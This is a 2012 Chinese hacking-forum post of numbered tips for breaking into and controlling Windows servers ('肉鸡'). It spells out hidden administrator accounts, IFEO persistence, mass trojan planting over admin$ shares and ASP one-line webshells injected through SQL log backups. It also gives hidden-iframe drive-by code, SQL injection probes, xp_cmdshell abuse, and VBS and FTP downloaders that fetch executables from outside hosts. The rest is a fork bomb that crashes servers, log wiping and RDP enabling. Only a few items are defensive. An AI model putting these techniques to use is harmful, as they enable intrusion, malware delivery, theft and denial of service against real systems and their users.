找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2378|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
. `. L; k: Z$ |) K2 ncacls C:\windows\system32 /G hqw20:R; z+ ~& M% ~9 @3 ]: D6 o' g/ j& [
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入; V2 |4 ?: \8 K- D
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
; m4 _( ]7 r0 n
* ~- X" R6 @5 u  S1 o2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
. T8 H2 y8 Z9 h" O" J
5 Y9 @* \7 l8 `3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。+ x+ Y: p' v# s

6 @7 B! k9 o0 f4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号. Z7 x! M- Q% w' n, J) d
. L5 h  r2 i/ q5 y' V$ \1 b" L
5、利用INF文件来修改注册表
3 M: b) C5 [6 X6 r- {[Version]) k5 F( _& Y, m8 m( j: U, s7 ^
Signature="$CHICAGO$"6 H4 ?* i: ~; @
[Defaultinstall]
- s( a% T3 e6 X9 m  |7 PaddREG=Ating
9 d, B; Y1 y& Q- K- I[Ating]4 a# K& R# F9 G3 D2 W& |
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
1 t: \8 Y  x0 j7 S% u以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
- {; M7 |) L. S' s" d# L9 }+ `rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径  d. V; W( U) p4 [6 n9 f. ^5 ?7 y
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU! j/ M* u  R, ^
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU2 c6 G# l* m+ o9 U+ M. N% c
HKEY_CURRENT_CONFIG 简写为 HKCC( I+ v2 T% I1 I
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值  f+ t8 q3 S& w$ {' \2 ?9 o
"1"这里代表是写入或删除注册表键值中的具体数据
# _, |- k; Q8 E- Q
0 _( U: A4 p+ {! n7 z5 m, }! |$ k6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,* f6 F, _5 T& Y1 n6 z* y
多了一步就是在防火墙里添加个端口,然后导出其键值: ~3 o) t0 A1 v+ D7 g$ T$ D
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]2 c% t- V  s/ Q

$ a! V5 X+ ?+ e  W8 Z5 R. @; W$ D7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
- ^3 _4 c, P/ y在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。6 x3 x0 ~* z  I6 y( h5 r; |* ^

, z6 ~" X2 L% m9 I8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
6 W( R1 j4 i; b/ Y* u' B/ g: `% r0 }& I) i: E1 {) q) C
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
- P+ v: r6 x, W% ]可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
1 }, g: L) _* w, u+ M# `6 F3 A1 z) N2 t
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”/ J% Q" }3 f, B3 p3 B( G- P8 K/ r

- `& {: S' z6 R11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
$ T9 V$ o9 ?" m用法:xsniff –pass –hide –log pass.txt3 r6 q+ v* R% u: [1 P0 V# N

. u- Z; Q/ E5 d- H12、google搜索的艺术
5 @& d% t4 ?" m8 A7 u0 b4 _搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
/ ?+ a5 \3 P: u! V  d或“字符串的语法错误”可以找到很多sql注入漏洞。
0 O1 ^6 \9 n7 s9 }( a
* g, }8 r" J1 m. {13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。. r4 |. y9 t# C/ J* V% A
( D7 N2 U7 |* @) m, d1 M
14、cmd中输入 nc –vv –l –p 1987. X. {  U7 c* P% w- j( y+ T
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃; q4 Z- T& M, j! k

) t, I! l/ h3 b15、制作T++木马,先写个ating.hta文件,内容为
7 i) {5 \# O' B0 N$ O2 j<script language="VBScript">; ]7 Y( z2 X  _% B' H9 ?+ Y& {
set wshshell=createobject ("wscript.shell" )% q2 K/ r) g& p8 ~3 X
a=wshshell.run("你马的名称",1)
+ w/ i3 L3 ?: w( H( Ywindow.close
+ S8 ~' q) d9 S5 l</script>
- q5 S0 @. \  ^0 }2 D' H再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
( n* r& y2 g  }. D7 j: t: q3 s5 @6 v2 [
16、搜索栏里输入/ w( O+ R) q5 M' g% D, g- a
关键字%'and 1=1 and '%'='
$ P1 r2 r* b1 W8 I; R关键字%'and 1=2 and '%'='' e# `$ i# y: u$ Z1 ?5 Q( O4 L
比较不同处 可以作为注入的特征字符1 U" v" |  L* |( b' x  [4 Y; h

* h+ t8 e$ ]+ T# Q, n7 U: l/ X17、挂马代码<html>) c( S: ^  u/ K1 m
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
$ I2 H! S$ _! Y</html>, S! P) M: ^' S# q5 n

. ?) S/ l) R' W1 T7 u" I18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,2 f' U1 f3 q, ^! [
net localgroup administrators还是可以看出Guest是管理员来。6 I" x7 \8 U* U! O: C( |

2 E! r# w- h9 X- C+ Z$ u19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等! W7 A, ?* g  n6 U
用法: 安装: instsrv.exe 服务名称 路径
7 m9 ]3 l1 D1 c+ q' g5 K, Y卸载: instsrv.exe 服务名称 REMOVE
7 I4 Y( o1 k+ j" S4 d6 g! O! ?6 u/ O- K; o' F

. ^8 T2 ~$ B1 l0 ~21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉0 o3 i' W! E9 ~9 @) q
不能注入时要第一时间想到%5c暴库。
' C. o  X6 O* |6 t% @  U: Z
" Z) P; V- t( b" d: h9 W* ?7 C) Q22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
0 z4 l- ]# f5 {* q& j+ A/ L) |+ [" I/ p3 O& x
23、缺少xp_cmdshell时  l! A4 |# C4 r2 Y- s. @0 `/ v
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'( W5 t! x% m7 J2 i
假如恢复不成功,可以尝试直接加用户(针对开3389的)0 }/ a5 G+ \) L& Z
declare @o int
7 S0 C" i" T  s2 uexec sp_oacreate 'wscript.shell',@o out
  A2 h. x: @: r( lexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
! a+ J5 I/ d% {9 w& W* x# p+ e$ Q, p) U, h2 t1 z/ W6 E
24.批量种植木马.bat
$ S5 X0 ^; c1 F: T& e: I1 K+ E( Ufor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中) x( j$ v8 r' ~: k
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间: f' s8 I# J2 X( q
扫描地址.txt里每个主机名一行 用\\开头
) v3 X+ ~. B. X) c  D
' ]4 L( N& t# R! ]9 w6 \  o% r5 K! X25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。4 P5 e/ Q' |5 u- m5 O' j( e' Y

. ^$ @" K5 t+ q7 s26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.9 }- j/ k# r1 j" M7 x& [; o0 N3 F/ y
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.( h: s9 a2 p: r5 Z" p4 q
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
; {; f& u% c/ P' ~
  a. _6 M  D+ E0 a1 Q27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP! X* U# b2 k6 {) k6 T
然后用#clear logg和#clear line vty *删除日志9 n' S+ d) ~' v; R- Z  s. E
* I/ p1 b8 m$ h
28、电脑坏了省去重新安装系统的方法; j5 O/ A& T- |& F1 k
纯dos下执行,, Z, y( }6 _2 J( w; `& l
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
4 k4 }5 x/ a9 ]* r8 [/ _' j8 t) b* v2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config# a) s- \7 x! _# k$ Y2 l6 a
8 ^% I: m( K( k: G2 b
29、解决TCP/IP筛选 在注册表里有三处,分别是:8 w4 T# Q: c, W3 p
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
  B: X8 M5 o- F/ d$ m4 F2 l7 ~8 PHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip% p. {4 x( `8 {* g1 W5 d
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip4 {7 X& A- k" E) q
分别用: E& b7 j4 z9 z; F
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
/ z) {+ e) z5 O# dregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
3 m/ g" W! f9 x* n$ k$ g- o5 Qregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip& v: K& f4 v- Y! H3 i7 A" K
命令来导出注册表项
3 ^2 W! [" E: s8 \  a然后把三个文件里的EnableSecurityFilters"=dword:00000001,
1 d  u  X  t: ?2 b1 @" @7 V; ?改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用5 `5 [$ @3 x1 k: l; Y" @4 ^2 `$ C
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
/ y6 D, j% H( _" E* |- i9 }# E. f: y; W+ f% L1 Q  C& X
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U! r" S% m& B- C4 ]) |; m5 Y
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的36 ]' q" `! Q$ T5 v3 v+ h' k

- p7 y6 p+ Z- g% a0 L, T31、全手工打造开3389工具6 s3 f  _) C# ~: h2 g1 z) F" h' [
打开记事本,编辑内容如下:9 M' m8 b5 a- A/ c0 s
echo [Components] > c:\sql. D" P) t  _. ~# ~! T1 V4 Q5 E
echo TSEnable = on >> c:\sql
8 k# n! C2 `# K! Wsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
) E% q- l' G/ z: Q编辑好后存为BAT文件,上传至肉鸡,执行" F9 K- L+ M$ V/ Z6 }
" ^/ k3 Y9 w3 ^+ H. T; g
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
, @% s% m+ z* H8 a9 E$ a
# Q! _! F9 D$ d" K9 H33、让服务器重启+ l9 i4 O9 k' ~2 r
写个bat死循环:
% h. o; V5 j, G/ y7 o@echo off2 m- w; U7 g6 f  p, f, S
:loop15 K7 U5 D; A4 J  j
cls
# q/ o; W* s5 Z! t8 |start cmd.exe0 s* a' K* @1 p: U- }
goto loop1- G. G9 i. ]. `! d1 w0 v, N3 \+ W( w
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启( G! E/ [$ A3 U/ f, p. V6 h

# U8 `0 ~/ s7 {- Y+ W! H' M34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
- D, }/ P$ C* t- [% o" ?@echo off
4 ~7 \8 ?8 P$ j6 q7 T1 W7 T4 f2 Vdate /t >c:/3389.txt
( ^/ V8 l" r+ {& Dtime /t >>c:/3389.txt; H) K; u- E0 M3 f& e  {6 n# K
attrib +s +h c:/3389.bat/ t8 r; ?! [- g. i& v
attrib +s +h c:/3389.txt$ E- N6 T6 g# f8 ^* W
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt, s+ f- U+ [7 O6 _+ _8 e! l( V% Y
并保存为3389.bat
; K- h$ V( r. i9 B打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号* a7 P: i0 @, o
, H* Q0 ]) `1 r0 n0 W/ |& }$ x
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
# |% a; z( g- y8 b9 _start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)3 `# p& H5 E8 r# ~
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。2 N; R" Q+ L( P0 p  w

5 A5 b+ M1 a4 l  l5 ]6 \36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件, N- n! \1 x7 Y$ E
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址" `0 {6 `. q# R" ~9 @- T* Z3 `
echo 你的FTP账号 >>c:\1.bat //输入账号
# x! Y$ I: [" Necho 你的FTP密码 >>c:\1.bat //输入密码
* k  \6 Y) O3 S5 V1 R0 A' \$ recho bin >>c:\1.bat //登入
6 X' ^) n" _9 s# J1 U  y7 y1 iecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么% u8 ^. `9 E9 [# z: ~, E; B
echo bye >>c:\1.bat //退出
" y8 [6 y$ N9 i- d然后执行ftp -s:c:\1.bat即可% n% i. w6 b# q1 c# z
/ ~( i( F/ ^3 o% y
37、修改注册表开3389两法
3 v8 v& K3 i. E1 I. s(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
7 Z7 M) o9 o: g' G" W' d( Zecho Windows Registry Editor Version 5.00 >>3389.reg
5 V8 k& z$ A8 e! k. @. R9 t/ oecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg2 `& H7 ]- V8 D& X* D
echo "Enabled"="0" >>3389.reg: I" M' s; r# Z9 [# E* `+ v0 P
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows4 Z5 g! O& w: f& }  S/ b6 i
NT\CurrentVersion\Winlogon] >>3389.reg
* b5 E1 y) r2 \( ?8 L2 qecho "ShutdownWithoutLogon"="0" >>3389.reg
- h# D" c) c3 x/ q. Techo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
& E5 ]) }" l& R: r( D$ Y( e>>3389.reg8 y, r: K. n* G
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg3 m( h* q: F0 ~4 C: c$ p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]4 n- o( J% e$ r7 y- ?
>>3389.reg* o& w" L+ N; I2 s$ ^4 b( X
echo "TSEnabled"=dword:00000001 >>3389.reg
' Y0 c" ^" ?3 c" V; h4 n3 k' i) Gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg; `% S! x! y' w9 `/ C. u
echo "Start"=dword:00000002 >>3389.reg
/ i4 K( y5 H9 l. c2 c3 r8 Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
( q$ S/ T5 G7 s, K>>3389.reg) k$ C; q% K5 Y- D# q/ l% F
echo "Start"=dword:00000002 >>3389.reg5 ~# i6 X8 I; P8 Z. j
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
) q( C2 l9 v9 `) O1 ~# T1 aecho "Hotkey"="1" >>3389.reg
5 ^2 Q$ }! ^4 b& t1 T! I7 ~: Lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 Q5 D8 D5 m: R8 q) I* W* uServer\Wds\rdpwd\Tds\tcp] >>3389.reg& J- M7 D5 f' M" m1 J
echo "PortNumber"=dword:00000D3D >>3389.reg& c5 L2 S/ `5 J. u1 g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 J1 e2 E: h5 Q% q+ i# oServer\WinStations\RDP-Tcp] >>3389.reg$ W0 @0 ]& S. r, L1 F
echo "PortNumber"=dword:00000D3D >>3389.reg
4 C: ]) s. Y- G把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
: Q4 j2 G/ j& N) o6 @(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
. Z3 G. k5 H% h1 u# s( n) ~0 L/ G因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效3 {. d: Y7 p2 q$ W1 c: Y
(2)winxp和win2003终端开启
7 e  ~6 ~) ~9 h* w用以下ECHO代码写一个REG文件:" c$ `# s# y) J2 k
echo Windows Registry Editor Version 5.00>>3389.reg
! k9 N7 r+ n4 u+ N2 _6 E1 O: T& |; secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal/ ^" s/ H8 C$ M. j2 g1 V, n7 Y  x' i
Server]>>3389.reg4 z) A% D1 Y. [2 X( o
echo "fDenyTSConnections"=dword:00000000>>3389.reg' k/ _$ t+ M: ^, J/ r  D* V! j
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal: F4 i8 u. Z4 ~% \, O8 Y5 o
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
" w4 y* x! p9 B: Y! u& J' T/ O4 techo "PortNumber"=dword:00000d3d>>3389.reg
- M% L; Q1 q( M) Gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* o/ M$ c6 z! nServer\WinStations\RDP-Tcp]>>3389.reg
, }/ x6 B$ p0 K% B) ?echo "PortNumber"=dword:00000d3d>>3389.reg; ?/ W$ R2 j0 u( m  B* W) K- D  U
然后regedit /s 3389.reg del 3389.reg' m& ~: D: J5 s: a1 h  T3 \; P' @0 E
XP下不论开终端还是改终端端口都不需重启
' m! i0 a( z" l- @( G& v
' f: `% R; t2 q9 @; p9 X' t) Q/ K38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
! p3 {, X8 g4 `" a" h3 }, i, k用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
- J- O" N1 Q* v8 M& M8 ^) s1 w
9 `2 ^9 _: k& F9 E6 y39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!! |7 R& ]: Z6 ^, ]( B( ], N' B6 ~2 O
(1)数据库文件名应复杂并要有特殊字符" `  Y% k/ i2 D9 Q4 R9 N
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
0 v& Q* k( r& y将conn.asp文档中的
( U# t3 h! ~# ?: IDBPath = Server.MapPath("数据库.mdb")
0 s! ^! h0 W! a$ h1 wconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath5 g" C' l( g2 ~7 ~" T6 T

% X) g5 @8 w' P- W* ]- m$ n, ]5 L# {0 O修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
7 A2 d6 S: l. k(3)不放在WEB目录里
1 Z& T8 E; b' r* r* Y# P+ v/ E! @& J) R7 R
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉, x" J) y9 {8 B
可以写两个bat文件
% o8 h; y; G6 b% ~5 _@echo off, S! e: z! O2 c) O
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe2 y$ o" `  T+ A$ f6 Q; U9 N  o
@del c:\winnt\system32\query.exe% h9 z1 |$ Q; g$ n
@del %SYSTEMROOT%\system32\dllcache\query.exe3 W% e$ l) P% E/ c' B9 ~# S9 t- P0 z
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
, L, D: {+ @9 e3 l' N
4 D  [9 N  p3 E, ~& Z$ P@echo off
- {! g  q* v1 a1 V@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe+ d- I  A3 A" r$ q& {3 a# M5 i
@del c:\winnt\system32\tsadmin.exe
8 l# J" A8 i: C: x7 ^* ^@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex* B2 X/ ?& }/ E7 F5 c" a
: g3 R5 Q5 R( n5 X. u
41、映射对方盘符/ j( p1 d" q" u0 Z, r
telnet到他的机器上,  E1 O9 x- h2 c, p
net share 查看有没有默认共享 如果没有,那么就接着运行' a: z& ~/ h  q5 K: T
net share c$=c:1 K* r/ r1 L; b% E% s  s# y5 k# u
net share现在有c$
5 `" r% p0 [! W: c: ~% e0 e8 C0 C在自己的机器上运行& R/ @4 Q' s7 S! t3 |
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K; y/ r9 M5 t" O# f" i

, f; e+ L' a1 E2 y' |8 M, I1 a2 E1 E42、一些很有用的老知识
0 O9 ]7 ]7 ]: i2 @7 ?) htype c:\boot.ini ( 查看系统版本 )
' N- J! U& I# I, E- S# Jnet start (查看已经启动的服务)2 W6 |8 N/ w& B8 t% x7 [+ z/ P
query user ( 查看当前终端连接 )
9 k: A& @* k6 C! l1 S) Rnet user ( 查看当前用户 )
; h/ ?" U9 W, ynet user 用户 密码/add ( 建立账号 )( Y" {. Q, ~5 p: A
net localgroup administrators 用户 /add (提升某用户为管理员)
+ X+ l. ~2 \. x( Y2 D9 fipconfig -all ( 查看IP什么的 )) c9 W# u, w' ^& g9 W; o* E& Y
netstat -an ( 查看当前网络状态 )
3 f9 M9 c$ T1 n+ \findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)3 P  p% ~- l' [; q5 P3 m4 C7 W
克隆时Administrator对应1F4
) g6 {) j9 `9 yguest对应1F5
3 K9 g9 u! [8 c* H: n! \tsinternetuser对应3E8) a2 z# P$ m" S' r: ?4 s8 l

7 N0 G: A5 e7 |3 |43、如果对方没开3389,但是装了Remote Administrator Service7 V+ Y! `# k  M/ y4 x( }5 s
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
8 d9 R# U0 d$ v, b( G解释:用serv-u漏洞导入自己配制好的radmin的注册表信息% A2 G: X$ K) ^6 b* l4 ]
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
/ @- v" m& |' S4 |) w2 k7 y& z) n, D% l3 R3 f
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定); h. J8 U8 J1 |) _3 _
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)/ H) [' I! `/ H3 m3 l- @5 U0 ~$ |

" b  p" X* w% p% D' |% X, s45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
% {6 K6 {- T. _echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open3 x( u& D: G- X5 {
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
: j7 D5 _# p% v; T  ^% y4 vCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
+ Q4 R6 A6 N: f0 }$ h2 R1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
! y% H" z6 k9 X$ T* r. I5 l1 G(这是完整的一句话,其中没有换行符)
) B6 Q4 f4 W9 K" {0 i& \/ a) c然后下载:2 u' u1 ?: s6 f! P, T0 j, @1 z0 U! \& X
cscript down.vbs http://www.hack520.org/hack.exe hack.exe1 D# @- N4 U6 E9 E) f7 v2 c

1 h; E, ~# ~0 `46、一句话木马成功依赖于两个条件:
" f) w* H$ I4 ~3 {& d7 `/ I' q1、服务端没有禁止adodb.Stream或FSO组件2 ]5 B. v& W7 \# n, S
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
: N5 Q% r0 y; C7 {3 |4 y8 u* I% _' w6 P/ Q( B% {" Z
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
% P( ^! E9 w1 p;alter database utsz set RECOVERY FULL--
& j+ r/ P* ^1 f;create table cmd (a image)--3 e( Y2 f9 c/ {
;backup log utsz to disk = 'D:\cmd' with init--: r6 L( q- F; X( [. I0 P9 N$ x
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--9 @( w; |+ I: q  Q; I
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--" |( T4 r1 m' s+ v% n+ r! h
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。7 S) }: |7 h9 d0 A1 N

4 z: r0 A5 x: F# o: W48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
! C4 l$ W! L! G( I* Q/ \% @% z5 h* \& [. N; }
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
+ L( X3 f! ]0 o/ o7 s: Y' S! ]5 d所有会话用 'all'。
+ L6 ^; b& X, u. e5 r-s sessionid 列出会话的信息。4 V- N+ ~" b+ [, v% T* A
-k sessionid 终止会话。' e1 B+ f' [' T9 _
-m sessionid 发送消息到会话。# @* p: h* [( U" P6 J1 C9 ~& M
/ X. [/ e: \0 `/ E4 R/ I
config 配置 telnet 服务器参数。
+ W( [6 h3 X, o+ o# q/ k) S0 V: \- |$ P; N& I0 j+ X
common_options 为:
% N; y* n* v* ^7 Z8 s" ^! V2 N( {-u user 指定要使用其凭据的用户9 K; q% W6 R7 E9 v+ O' U
-p password 用户密码
* o8 d  O; _( O" i  ^, v" Q$ X4 w; S4 a6 T
config_options 为:
) I4 [7 b% C# f5 w, ldom = domain 设定用户的默认域
  V. b, K9 p! B8 uctrlakeymap = yes|no 设定 ALT 键的映射. g5 v* {: q$ P
timeout = hh:mm:ss 设定空闲会话超时值8 h( F3 y! y5 H
timeoutactive = yes|no 启用空闲会话。1 Q) h7 L/ n% h$ a' x5 `; l
maxfail = attempts 设定断开前失败的登录企图数。/ b4 k# ^9 V1 G7 W
maxconn = connections 设定最大连接数。- h& G. x9 l2 V& N. c" Y1 D
port = number 设定 telnet 端口。+ M! ~* V9 n; X6 N* s
sec = [+/-]NTLM [+/-]passwd1 a; }( r6 A( Y0 H
设定身份验证机构
- N' j7 @5 g( q. g$ tfname = file 指定审计文件名。
! Y# x! @: o/ Z  ]3 O% I& A$ rfsize = size 指定审计文件的最大尺寸(MB)。
- L. a  k1 v" [# e, ?' }( E; pmode = console|stream 指定操作模式。6 G" ]# l7 A0 @
auditlocation = eventlog|file|both, g: D2 }3 Y! d1 L
指定记录地点+ F0 `2 a$ c% J& C; s
audit = [+/-]user [+/-]fail [+/-]admin
6 O# k9 D& p  U5 N
) O+ q  R: q7 F/ `1 K6 N- ]5 E49、例如:在IE上访问:' M% N5 n+ Q- j# }+ `
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
/ p$ q' f3 E! [. y5 ?hack.txt里面的代码是:/ x+ d" K# L5 U! @8 R" Q/ o) w- d
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
+ b! w, ^/ \( J! E" p5 n把这个hack.txt发到你空间就可以了!
; i3 ?! ^  D" p. e# [" s3 P% R6 P这个可以利用来做网马哦!7 H: D. X5 N2 X% d+ {; {% Z: [

  k4 `9 {3 n4 M4 g+ ?1 L; ?4 G. F50、autorun的病毒可以通过手动限制!
# }$ Y0 t! H- w+ V: ]9 X/ f* F1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
  u! K: J3 s  K: o8 m: A$ z5 F2,打开盘符用右键打开!切忌双击盘符~; q: S+ @. M9 X$ Y# _% q- @& |
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
4 y6 A% ?: @# A" H  Q1 Y4 e: ]- O+ F0 k9 A" W/ @' i6 p: Z- u+ O9 Y
51、log备份时的一句话木马:/ X8 E  `: b* j: E: `; t
a).<%%25Execute(request("go"))%%25>& r+ ]; y3 D3 }0 r
